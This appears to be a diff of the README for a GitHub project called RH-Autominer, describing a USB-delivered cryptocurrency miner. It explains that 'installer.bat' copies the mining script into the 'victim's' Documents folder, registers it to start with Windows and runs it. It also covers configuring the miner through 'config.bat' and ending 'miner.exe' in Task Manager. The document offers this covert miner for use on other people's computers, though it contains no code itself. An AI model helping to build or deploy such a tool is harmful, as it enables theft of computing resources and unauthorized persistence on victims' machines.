RickardHarrim/RH-Autominer/README.md

 To shut down the miner, open task manger, navigate to processes and search for “miner.exe” or “miner”.
 When you have found it, it’s just to mark it and click on “End task”.

-WARNING

-What the installer does:
+# What the installer does:
 When the usb drive is inserted to a new computer nothing will happen until you start “installer.bat”.
 When “installer.bat” is executed, it will copy the script form the usb drive to the victim’s documents folder on the C drive.
 After that it will setup the “start with windows” function and run the script.

-How to setup the Autominer:
+# How to setup the Autominer:
 1. Change the miner settings to your liking.
 To change the setting, edit "config.bat" in "RH Autominer" folder.
 For more help with the miner please refer to the "Help" document.